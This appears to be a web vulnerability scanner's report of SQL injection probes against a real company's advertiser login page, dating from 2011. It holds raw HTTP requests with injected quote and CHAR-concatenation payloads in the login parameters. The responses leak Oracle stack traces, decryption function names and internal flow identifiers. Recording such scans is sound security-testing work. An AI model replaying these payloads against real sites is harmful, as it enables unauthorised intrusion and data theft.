<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map[&#039;method&#039; -&gt; &#039;setupForm&#039;]] in state &#039;enterCriteria&#039; of flow &#039;loginact-flow&#039; -- action execution attributes were &#039;map[&#039;method&#039; -&gt; &#039;setupForm&#039;]&#039;; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [72000]; error code [1465]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-01465: invalid hex number; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-01465: invalid hex number
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownTimer();
});
});
</script>
<!-- DROP DOWN END -->
<div id="footer" >




<div id="sitemap">

<div class="block first">


<h4>Company:</h4>
<ul>
<li><a href="https://www.supermedia.com/about-us" title="About Us">About Us</a></li>
<li><a href="https://www.supermedia.com/press" title="Pre..
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=..

Request

GET /spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=3&=%2527&_flowId=loginact-flow HTTP/1.1
Referer: https://www.supermedia.com/spportal/indexLogin.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=2FF790FDB315C80023FC621E3266E6C1.app7-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=RVU
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:59:49 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6211






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/indexLogin.do";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="2FF790FDB315C80023FC621E3266E6C1.app7-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map[&#039;method&#039; -&gt; &#039;setupForm&#039;]] in state &#039;enterCriteria&#039; of flow &#039;loginact-flow&#039; -- action execution attributes were &#039;map[&#039;method&#039; -&gt; &#039;setupForm&#039;]&#039;; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT_FFI&#034;, line 40ORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT&#034;, line 138ORA-06512: at &#034;PSMGR.DECRYPT_FUNCTION&#034;, line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT_FFI&#034;, line 40ORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT&#034;, line 138ORA-06512: at &#034;PSMGR.DECRYPT_FUNCTION&#034;, line 8
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownT..
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=..

Parameters

Parameter Type Value
fromPage GET index
username GET Ronald Smith
password GET 3
GET 3
_flowId GET 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'

Request

GET /spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=3&=3&_flowId='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B' HTTP/1.1
Referer: https://www.supermedia.com/spportal/indexLogin.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=EF46B22FE38C1DFD3796C73A1E51B52E.app5-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 12:00:01 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6550






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@2463c5dd targetAction = com.idearc.ssa.web.spring.LoginActAction@18c32a5d, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="EF46B22FE38C1DFD3796C73A1E51B52E.app5-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
No such flow definition with id &#039;&#039;AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+&#039;&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, 